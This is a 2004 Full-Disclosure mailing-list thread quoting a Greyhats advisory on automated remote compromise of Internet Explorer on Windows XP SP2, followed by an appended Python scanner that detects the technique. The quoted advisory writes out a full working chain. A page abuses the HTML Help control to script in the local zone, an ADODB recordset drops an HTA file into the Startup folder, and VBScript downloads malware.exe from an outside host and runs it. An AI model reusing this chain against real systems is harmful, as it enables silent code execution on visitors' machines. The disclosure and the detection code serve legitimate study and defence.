Message-ID: <JBEEIFHMJEMDBGMNEHCOGEEECAAA.mevanchik@relationship1.com>
Date: Sat, 25 Dec 2004 21:08:23 -0500
From: "Michael Evanchik" <mevanchik@...ationship1.com>
To: "morning_wood" <se_cur_ity@...mail.com>,
<full-disclosure@...ts.netsys.com>, <bugtraq@...urityfocus.com>,
<NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>, <vuln@...nwatch.org>
Subject: RE: YEY AGAIN Automatic remote compromise of Internet Explorer Service Pack 2 XP SP2
Not sure about the issue with SP1. We didn't test on older technology; we don't have
access to an SP1 machine anymore.
Mike
www.michaelevanchik.com
-----Original Message-----
From: full-disclosure-bounces@...ts.netsys.com
[mailto:full-disclosure-bounces@...ts.netsys.com]On Behalf Of
morning_wood
Sent: Saturday, December 25, 2004 1:24 PM
To: Michael Evanchik; full-disclosure@...ts.netsys.com;
bugtraq@...urityfocus.com; NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM;
vuln@...nwatch.org
Subject: Re: [Full-Disclosure] YEY AGAIN Automatic remote compromise of Internet Explorer Service Pack 2 XP SP2
Must only be for SP2? No effect on SP1:
no drop, no funny action noted.
cheers,
mw
----- Original Message -----
From: "Michael Evanchik" <mevanchik@...ationship1.com>
To: <full-disclosure@...ts.netsys.com>; <bugtraq@...urityfocus.com>;
<NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>; <vuln@...nwatch.org>
Sent: Friday, December 24, 2004 8:10 AM
Subject: [Full-Disclosure] YEY AGAIN Automatic remote compromise of Internet Explorer Service Pack 2 XP SP2
> Did they really do a good job on service pack 2? Was it worth the
> investment that's reported more than the missile defense system? Do all
> these articles on the great achievement by Microsoft and XP SP2 really
> have merit? They totally forgot HTA files and HTM help files. Who knows
> what else.
>
> "Microsoft SP2 team, that is unacceptable, YOU'RE FIRED." Donald Trump
>
> http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm
>
> Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise
>
> Dec 21, 2004
>
> Vulnerable
> ----------
> - Microsoft Internet Explorer 6.0
> - Microsoft Windows XP Pro SP2
> - Microsoft Windows XP Home SP2
>
>
> Not Tested
> ----------
> - Microsoft Windows 98
> - Microsoft Internet Explorer 5.x
> - Microsoft Windows 2003 Server
>
>
>
> Severity
> ---------
> Critical - Remote code execution, no user intervention
>
>
> Intro
> ------
> Although hundreds of millions of dollars have been spent on securing SP2,
> perfection is impossible. Through the joint effort of Michael Evanchik
> (http://www.michaelevanchik.com) and Paul from Greyhats Security
> (http://greyhats.cjb.net), a very critical vulnerability has been developed
> that can compromise a user's system without the need for user interaction
> besides visiting the malicious page. The vulnerability is not actually a
> vulnerability in itself, but rather it uses multiple known holes in SP2,
> including Help ActiveX Control Related Topics Zone Security Bypass
> Vulnerability and Help ActiveX Control Related Topics Cross Site Scripting
> Vulnerability.
>
> Why Microsoft has still not patched two of these known vulnerabilities that
> have been out for almost half a year now is beyond me.
>
>
> Tech Stuff and Explanation
> --------------------------
>
> 1. Create a webpage with the following code:
>
> sp2rc.htm
> ---------------------------------------------------------------------
> <OBJECT id="localpage" type="application/x-oleobject"
> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
> style="position:absolute;top:140;left:72;z-index:100;"
> codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
> <PARAM name="Command" value="Related Topics, MENU">
> <PARAM name="Button" value="Text:Just a button">
> <PARAM name="Window" value="$global_blank">
> <PARAM name="Item1"
> value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
> </OBJECT>
>
> <OBJECT id="inject" type="application/x-oleobject"
> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
> style="position:absolute;top:140;left:72;z-index:100;"
> codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
> <PARAM name="Command" value="Related Topics, MENU">
> <PARAM name="Button" value="Text:Just a button">
> <PARAM name="Window" value="$global_blank">
> <PARAM name="Item1"
> value='command;javascript:execScript("document.write(\"<script language=\\\"vbscript\\\" src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
> </OBJECT>
>
> <script>
> localpage.HHClick();
> setTimeout("inject.HHClick()",100);
> </script>
> ---------------------------------------------------------------------
>
> Explanation of above code:
> The first object (id: localpage) tells hhctrl.ocx to open a help popup
> window to the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm.
> This file was chosen because it is treated as the local zone and it doesn't
> have any script to mess us up. On some computers an error is shown before
> the popup. This is the user's only chance to prevent the vulnerability from
> working. If Internet Explorer were to be closed at this point, the user
> would be safe.
>
> The second object (id: inject) tells the help popup to navigate to a
> javascript protocol, which executes. Thus, cross site scripting has just
> taken place. A script tag that uses a remote file is written to the page,
> and writehta.txt (below) is executed in the unsecured local zone.
>
> In the script, HHClick is able to be used to automate the vulnerability.
> This is more effective than the previously described method of requiring a
> user to click on a button.
>
>
> 2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to the
> user's startup folder. See Michael Evanchik's analysis of the drag and drop
> vulnerability for an explanation on adodb recordset.
>
> Also it is reported that an ADODB recordset can be built locally without
> using an http server or ftp server like below.
>
> writehta.txt
> ---------------------------------------------------------------------
> Dim Conn, rs
> Set Conn = CreateObject("ADODB.Connection")
> Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
> "Dbq=http://www.malware.com;" & _
> "Extensions=asc,csv,tab,txt;" & _
> "Persist Security Info=False"
> Dim sql
> sql = "SELECT * from foobar.txt"
> set rs = conn.execute(sql)
> set rs =CreateObject("ADODB.recordset")
> rs.Open "SELECT * from foobar.txt", conn
> rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
> rs.close
> conn.close
> window.close
> ---------------------------------------------------------------------
>
>
> 3. f00bar.txt (thanks malware for hosting this file) is the file requested
> by the adodb recordset (again, read the drag and drop analysis at
> www.michaelevanchik.com for an explanation on how this works and why
> f00bar.txt looks like it does). Because there is absolutely no limit on what
> you can do in an hta file, an old, yet effective method of requesting and
> saving a file to the user's hd is used. From that, a wscript shell is
> created and used to run the program. And now, ladies and gentlemen, we have
> compromised the user's machine.
>
> f00bar.txt
> ---------------------------------------------------------------------
> "meaning less shit i had to put here"
> "<script language=vbscript> crap = """
> """: on error resume next: crap = """
> """ : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
> """ : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : crap="""
> """ : o.send : crap="""
> """ : set s = createobject(""adodb.stream"") : crap="""
> """ : s.type=1 : crap="""
> """ : s.open : crap="""
> """ : s.write o.responseBody : crap="""
> """ : s.savetofile ""C:\malware.exe"",2 : crap="""
> """ : Set ws = CreateObject(""WScript.Shell"") : crap="""
> """ : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
> """</script> crap="""
> ---------------------------------------------------------------------
>
>
> 4. Upload hhctrl.ocx for the computers that don't happen to have this
> control. All XPs seem to have this by default; some Win2k3s do not
> (according to Michael Evanchik).
>
>
> Proof of Concept?
> ------------------
> - http://freehost07.websamba.com/greyhats/sp2rc.htm
>
> - If an error is shown, press OK. This is normal.
>
> - Notice in your startup menu a new file called Microsoft Office.hta. When
> run, this file will download and launch a harmless executable (which
> includes a pretty neat fire animation)
>
>
>
> Vendor Recommendations
> ----------------------
> - Like Michael Evanchik said in his previous analysis, Microsoft needs to
> apply XP Service Pack 2's local zone lockdown to .HTA files and HTML Help
> (chm) files as well.
>
> - This might be a little farfetched, but it would solve a lot of problems:
> Take out the startup folder and only support running files during startup
> through the registry. The startup folder is a major part of this
> vulnerability and I can almost guarantee it will be used for another remote
> compromise.
>
> - Microsoft could possibly take HTA files out altogether. I have not seen
> them used for anything beyond hacking.
>
> - No vulnerability is too small or too insignificant to be taken seriously.
> Treat every vulnerability as if it could be dangerous.
>
>
>
> User Recommendations
> ---------------------
> - Disable hta files.
> - Get yourself antivirus software. I recommend Symantec because once they
> get their lazy asses off the couch and fix some of this stuff you will be a
> lot better off.
> - Disable active scripting in Internet Explorer. If nothing else, do this.
> - Do not use Internet Explorer, use Mozilla Firebird (now known as Firefox,
> www.mozilla.org)
>
>
>
> Credit
> ------
> Paul from Greyhats
> Michael Evanchik
> Http equiv (thanks for allowing me to use your server for f00bar.txt)
>
>
> Greets
> ------
> - Liu Die Yu (all the work you've done is amazing)
>
>
> Contact
> -------
> paul@...yhats.cjb.net
> http://greyhats.cjb.net
>
> Note
> -----
> Greyhats is becoming bigger and is in need of an upgrade. If anyone is
> interested in donating some webspace and a domain name I would be very
> appreciative. Contact me so that we may work something out :)
>
> Michael Evanchik
> Relationship1
> p: 914-921-4400
> f: 914-921-6007
> mailto:mevanchik@...ationship1.com
> web: http://www.relationship1.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
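Editor's added example, not part of the thread or of the Greyhats advisory: a defender-side scanner for the pattern the quoted advisory describes. It parses HTML, flags any OBJECT that instantiates the HTML Help control (the CLSID quoted above) with a "Related Topics" command whose ItemN parameter uses the "command;" form to reach a javascript:, vbscript: or file: target, and notes when page script calls HHClick() so the popup fires without a user click. A second helper lists .hta files found in a Startup folder listing, which is where the quoted payload writes "Microsoft Office.hta". The sample pages are constructed here to mirror the quoted sp2rc.htm structure; the inline javascript payload and the benign help page are placeholders, not the original files.

```python
"""Scanner for hhctrl.ocx "Related Topics" abuse in HTML (added example)."""
import os
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (hhctrl.ocx), as quoted in the advisory.
HH_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Item targets an Internet-zone page should never hand to the help popup.
SUSPICIOUS_SCHEMES = ("javascript", "vbscript", "file")


class HelpControlScanner(HTMLParser):
    """Collect each <object> using the HH control, its <param>s, and all script text."""

    def __init__(self):
        super().__init__()
        self.objects = []       # [{"id": str, "params": {name: value}}, ...]
        self.script_text = []   # raw contents of every <script> block
        self._current = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object" and HH_CLSID in a.get("classid", "").lower():
            self._current = {"id": a.get("id", ""), "params": {}}
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name", "").lower()] = a.get("value", "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            self.objects.append(self._current)
            self._current = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def scan_html(html):
    """Return (items, automated).

    items: list of (object id, scheme) for every Related Topics "command;" item
           whose target uses a suspicious scheme.
    automated: True when script calls HHClick(), i.e. no user click is needed.
    """
    p = HelpControlScanner()
    p.feed(html)
    p.close()
    items = []
    for obj in p.objects:
        params = obj["params"]
        if "related topics" not in params.get("command", "").lower():
            continue
        for name, value in params.items():
            if not name.startswith("item"):
                continue
            kind, _, target = value.partition(";")
            if kind.strip().lower() != "command":
                continue          # "Title;topic.htm" entries are ordinary help links
            scheme = target.split(":", 1)[0].strip().lower()
            if scheme in SUSPICIOUS_SCHEMES:
                items.append((obj["id"], scheme))
    automated = bool(items) and re.search(r"\.HHClick\s*\(", "".join(p.script_text)) is not None
    return items, automated


def hta_names(entries):
    """Return the .hta file names among a directory listing (sorted)."""
    return sorted(e for e in entries if e.lower().endswith(".hta"))


def find_startup_hta(startup_dir):
    """List .hta files in a Startup folder; an empty list if the folder is absent."""
    try:
        return hta_names(os.listdir(startup_dir))
    except FileNotFoundError:
        return []


# Constructed sample mirroring the quoted sp2rc.htm (placeholder payload, not the original file).
SAMPLE_PAGE = """
<OBJECT id="localpage" type="application/x-oleobject"
 classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
 codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%" height=7%>
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\\WINDOWS\\PCHealth\\HelpCtr\\System\\blurbs\\tools.htm">
</OBJECT>
<OBJECT id="inject" type="application/x-oleobject"
 classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
 codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%" height=7%>
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Item1" value='command;javascript:execScript("document.write(1)")'>
</OBJECT>
<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
"""

# Constructed benign help page: Related Topics pointing at an ordinary topic file.
BENIGN_PAGE = """
<OBJECT id="rt" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics">
<PARAM name="Item1" value="Installing;install.htm">
</OBJECT>
"""

if __name__ == "__main__":
    print("sample:", scan_html(SAMPLE_PAGE))   # ([('localpage', 'file'), ('inject', 'javascript')], True)
    print("benign:", scan_html(BENIGN_PAGE))   # ([], False)
    print("startup:", hta_names(["desktop.ini", "Microsoft Office.hta"]))
```

The scanner keys on the combination the advisory relies on (HH control plus a "command;" item with a non-help scheme) rather than on the control alone, so legitimate help pages that use Related Topics with "Title;topic.htm" entries are not flagged; feed it saved pages or proxy-captured responses, and pair it with a periodic listing of the all-users and per-user Startup folders.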